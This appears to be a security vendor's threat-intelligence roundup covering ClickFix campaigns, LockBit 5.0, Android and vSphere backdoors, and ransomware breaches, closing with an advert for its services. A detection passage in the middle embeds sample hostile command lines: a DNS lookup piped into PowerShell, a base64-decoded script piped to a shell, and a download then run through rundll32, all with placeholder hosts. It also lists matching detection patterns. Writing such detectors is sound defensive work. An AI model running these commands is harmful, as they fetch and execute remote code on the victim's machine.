Advanced macOS ClickFix Variant Introduces Multi-Layered Stealer Techniques
The evolving ClickFix campaign now targets macOS systems with a refined variant known as Matryoshka, leveraging layered obfuscation and in-memory execution to evade detection. Victims are redirected via typosquatting domains into fake support pages, where they are tricked into running malicious Terminal commands. This user-driven action bypasses native macOS safeguards, enabling the execution of a concealed loader that retrieves additional payloads. The infection chain unpacks entirely in memory using encoded and compressed scripts, avoiding traditional file-based detection. Once active, the malware deploys an AppleScript stealer designed to extract browser credentials and cryptocurrency wallet data. It also integrates anti-analysis techniques such as API-gated communication and suppressed output to remain stealthy. In some cases, it manipulates applications like Ledger Live or initiates phishing prompts to harvest passwords, highlighting the growing sophistication of social engineering-driven macOS threats.
Cross-Platform Ransomware Expands Enterprise Attack Surface
LockBit 5.0 marks a major step forward in ransomware development, introducing a unified framework that targets Windows, Linux, and ESXi systems. While the core encryption and double-extortion logic remain consistent across platforms, the Windows variant adds evasion techniques such as process hollowing, ETW manipulation, and log clearing. Meanwhile, the Linux and ESXi versions are optimized for server environments, enabling fast encryption and disruption of virtual infrastructure. The ESXi build is particularly impactful, as it can shut down virtual machines to access and encrypt their data at scale. Using modern cryptographic methods and features like partial encryption and free-space wiping, the threat is clearly designed for large enterprise environments, highlighting the need for comprehensive security across endpoints, servers, and virtualization layers.
ClickFix Variant Leverages DNS Lookups for Stealthy Malware Delivery
Microsoft has identified a new evolution of the ClickFix technique, where attackers abuse DNS queries to deliver malware while evading traditional detection mechanisms. Victims are lured through fake error messages that instruct them to execute commands, unknowingly granting elevated access. In this variant, the initial command performs a DNS lookup against an attacker-controlled server instead of the system’s default resolver. The response is then parsed and executed as a second-stage payload, allowing malicious activity to blend into normal network traffic. This staged approach ultimately delivers ModeloRAT, a remote access trojan capable of system reconnaissance, data collection, and further payload execution. By leveraging trusted system tools and DNS traffic, the campaign highlights how attackers continue refining social engineering techniques to bypass defenses, particularly in corporate environments where such activity may appear legitimate.
Firmware-Level Android Backdoor Enables Persistent Full-Device Compromise
A newly identified Android threat known as Keenadu demonstrates how deeply embedded malware can achieve near-total control over infected devices. Unlike typical mobile threats, this backdoor can reside within firmware, allowing it to operate across all installed applications and bypass standard security controls. It spreads through multiple vectors, including compromised OTA updates, system apps, unofficial APKs, and even previously available apps on official app stores. The most advanced variant integrates into core system components, enabling extensive data access such as messages, credentials, and browsing activity—even in private sessions. Additionally, it can silently install applications and assign permissions without user awareness. Due to its deep system integration, removal is extremely difficult using conventional methods, making firmware replacement or device substitution the only reliable mitigation. This highlights the growing risks associated with supply chain compromises in the Android ecosystem.
Ransomware Incident Disrupts Operations at Major Japanese Hotel Chain
A recent cyberattack targeting Washington Hotel underscores the continued vulnerability of the hospitality sector to ransomware incidents. Detected on February 13, 2026, the intrusion involved unauthorized access to multiple internal servers, prompting the company to immediately disconnect external network connections and initiate containment procedures. An internal response team was assembled, and authorities alongside cybersecurity specialists were engaged to investigate the breach and evaluate potential data exposure. While certain business-critical systems were impacted, the extent of any data exfiltration remains unclear. Notably, customer data linked to the hotel’s membership program appears unaffected, as it is hosted on separate infrastructure. Some locations experienced minor disruptions to payment systems, though overall operations continued. The incident highlights how rapid isolation and coordinated response efforts are essential in limiting damage from ransomware attacks.
Ransomware Landscape Expands with Record Victims and Emerging Threat Groups
The global ransomware ecosystem reached new highs in 2025, with a significant surge in both victims and active threat groups. Researchers tracked over 7,400 organizations listed on extortion sites, marking a 30% increase compared to the previous year. At the same time, the number of identified ransomware groups climbed to 124, including dozens of newly emerging actors. This rapid expansion is partly driven by the growing accessibility of AI tools, which enable less experienced attackers to conduct phishing campaigns, analyze stolen data, and even assist in negotiations. Despite the rise in incidents, overall ransom payments have declined as more organizations resist extortion demands. However, the threat landscape is becoming increasingly fragmented, with smaller and more agile groups replacing large syndicates. Combined with common entry points such as phishing, credential abuse, and RDP exposure, ransomware remains a persistent and evolving risk for organizations worldwide.
Fake CAPTCHA Campaigns Enable Rapid Enterprise-Wide Compromise
A recent ClickFix-style attack demonstrates how a single user interaction with a fake CAPTCHA page can escalate into a full-scale enterprise breach. Victims are tricked into executing malicious commands via the Run dialog, initiating a multi-stage infection chain that deploys Latrodectus and Supper. The initial payload leverages PowerShell to download additional components, while DLL side-loading techniques ensure stealthy execution. Latrodectus focuses on reconnaissance, collecting system, network, and domain information to map the environment, whereas Supper establishes persistence and enables command-and-control communication. Together, they allow attackers to move laterally, execute further payloads, and potentially prepare ransomware deployment. The attack highlights how trusted user interactions can be weaponized, reinforcing the need for monitoring suspicious command execution, restricting script-based downloads, and strengthening user awareness against deceptive verification prompts.
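The three ClickFix variants above (the macOS Terminal chain that decodes and unpacks a script in memory, the DNS-lookup variant that resolves against an attacker-chosen server and executes the answer, and the Run-dialog PowerShell chain that downloads a component and hands it to a DLL host) share a small set of process-creation traits a defender can score. The following is an added example, not code from the original article or from any vendor it cites; the event tuples are constructed to resemble EDR or Sysmon process-creation telemetry, with placeholder hostnames and addresses, and the regexes are assumptions about command-line shapes rather than published signatures.

```python
import re

# Constructed process-creation events: (parent image, image, command line).
# These are not real telemetry from any incident, only shaped like it.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe",
     "cmd.exe /c nslookup -type=txt verify.example-placeholder.test 203.0.113.10 | powershell -"),
    ("Terminal", "zsh",
     "echo <base64-placeholder> | base64 -d | gunzip | sh"),
    ("explorer.exe", "powershell.exe",
     'powershell -w hidden -c "iwr https://example-placeholder.test/x -OutFile x.dll; rundll32 x.dll,Run"'),
    ("svchost.exe", "nslookup.exe", "nslookup www.example.com"),   # benign: default resolver, no chaining
    ("cmd.exe", "powershell.exe", 'powershell -c "Get-Date"'),     # benign: not from the Run dialog
]

RUN_DIALOG_PARENTS = {"explorer.exe"}                   # Win+R children are spawned by explorer.exe
RUN_DIALOG_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
DNS_TOOL = re.compile(r"\b(nslookup|Resolve-DnsName|dig)\b", re.I)
# nslookup <name> <server>, Resolve-DnsName -Server <x>, dig @<server>: an explicit resolver
# instead of the system default, which is the distinguishing trait of the DNS variant.
EXPLICIT_SERVER = re.compile(
    r"(nslookup(?:\s+-\S+)*\s+[^\s|]+\s+[^\s|]+)|(-Server\s+\S+)|(dig\s+@\S+)", re.I)
CHAINED_INTERPRETER = re.compile(r"\|\s*(powershell|pwsh|cmd|sh|bash|zsh|iex|Invoke-Expression)\b", re.I)
DECODE_CHAIN = re.compile(r"base64\s+(-d|--decode|-D)\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|Invoke-WebRequest|curl|wget|DownloadString|DownloadFile|Net\.WebClient)\b", re.I)
DLL_HOST = re.compile(r"\b(rundll32|regsvr32)(\.exe)?\b", re.I)

def clickfix_indicators(parent, image, cmdline):
    """Return the list of ClickFix-style traits present in one process-creation event."""
    reasons = []
    if parent.lower() in RUN_DIALOG_PARENTS and image.lower() in RUN_DIALOG_CHILDREN:
        reasons.append("interpreter launched from Run dialog (parent explorer.exe)")
    if DNS_TOOL.search(cmdline) and EXPLICIT_SERVER.search(cmdline):
        reasons.append("DNS lookup against explicitly specified resolver")
    if CHAINED_INTERPRETER.search(cmdline):
        reasons.append("command output piped into an interpreter")
    if DECODE_CHAIN.search(cmdline) and CHAINED_INTERPRETER.search(cmdline):
        reasons.append("encoded payload decoded in memory and piped to a shell")
    if DOWNLOAD_CRADLE.search(cmdline) and DLL_HOST.search(cmdline):
        reasons.append("download followed by DLL host execution (possible side-loading)")
    return reasons

def scan(events):
    """Map event index -> reasons for every event carrying at least one indicator."""
    flagged = {}
    for i, (parent, image, cmdline) in enumerate(events):
        reasons = clickfix_indicators(parent, image, cmdline)
        if reasons:
            flagged[i] = reasons
    return flagged

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][2], "->", "; ".join(reasons))
```

In a real pipeline the same function would run over the parent/image/command-line fields of your EDR's process events, and the two benign samples show why each trait is scored rather than alerted on alone.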
Research Highlights AI-Driven Approach for Detecting Android Ransomware via Network Traffic
A recent academic study explores a proactive approach to identifying Android ransomware by analyzing network traffic patterns through an ensemble machine learning framework. Rather than relying on static detection methods, the research emphasizes adaptive models capable of responding to evolving threat behavior, addressing challenges such as concept drift and obfuscation techniques. The proposed system combines multiple classifiers, including LightGBM, XGBoost, and Random Forest, to improve detection accuracy and resilience. Additionally, explainable AI techniques are incorporated to enhance transparency and support analyst decision-making. A key focus of the study is continuous learning, enabling models to update dynamically as new data emerges without requiring full retraining. Experimental results indicate strong performance, particularly from LightGBM, suggesting that such adaptive, data-driven approaches could significantly improve real-time ransomware detection in mobile environments.
Updated Analysis Reveals More Evasive Variant of Advanced Backdoor Malware
Recent updates from cybersecurity authorities highlight an evolved version of BRICKSTORM, introducing enhanced evasion through .NET Native Ahead-of-Time (AOT) compilation. This modification allows the malware to operate as a standalone binary, improving portability while making detection more challenging. Although it retains its core functionality—such as encrypted command-and-control communication—it differs from earlier versions by omitting built-in persistence mechanisms, instead relying on alternative execution strategies. The malware has been linked to long-term espionage campaigns targeting virtualized environments, particularly VMware vSphere infrastructures. Once inside a network, attackers can access sensitive systems, extract credentials from virtual machine snapshots, and establish hidden virtual machines for ongoing operations. The updated analysis also provides new detection signatures, reinforcing the need for organizations to enhance monitoring, segmentation, and hardening of critical infrastructure against increasingly stealthy backdoor threats.
Firewall Exploitation Emerges as Leading Entry Point for Ransomware Attacks
A recent threat intelligence report highlights that compromised firewalls played a role in the vast majority of ransomware incidents in 2025, underscoring their critical position in modern attack chains. Analysis of large-scale telemetry data shows that attackers frequently exploit outdated vulnerabilities or leverage stolen credentials to gain initial access through these perimeter devices. Notably, many of the weaknesses targeted are long-known issues, indicating that unpatched systems and legacy infrastructure remain a major risk. The findings also align with broader research pointing to network edge devices as common entry points for attackers. In several cases, compromised firewall appliances were linked to widespread campaigns involving groups such as Akira, affecting numerous organizations. The report reinforces the importance of timely patching, strong authentication controls, and continuous monitoring of edge infrastructure to reduce exposure to ransomware threats.
Semiconductor Firm Investigates Potential Ransomware Incident Following Network Intrusion
Advantest has disclosed a cybersecurity incident involving suspicious activity within its internal IT environment, raising concerns about possible ransomware deployment. The issue was first identified on February 15, prompting the company to swiftly initiate containment measures, including isolating impacted systems and engaging external cybersecurity specialists. Early findings indicate that an unauthorized actor may have gained access to parts of the network, though the exact entry point and full extent of the breach are still under investigation. The organization is currently assessing whether sensitive data, including customer or employee information, may have been affected. While operations continue, the incident highlights the importance of rapid detection and response in limiting potential damage. Further updates are expected as the investigation progresses and additional details become available.
Conclusion
In conclusion, the current threat landscape highlights the growing sophistication and diversity of cyberattacks, ranging from advanced ransomware operations and supply chain compromises to stealthy backdoors and social engineering campaigns. Attackers continue to exploit human behavior, legacy systems, and misconfigured infrastructure, making proactive security measures and rapid incident response more critical than ever.
As experts in ransomware recovery and cybersecurity, we provide specialized support through our ransomware decryption service, Ransomware Negotiation Services, and a proactive Incident Response Retainer. If your organization needs assistance recovering from an attack or strengthening its defenses, get in touch with our team today.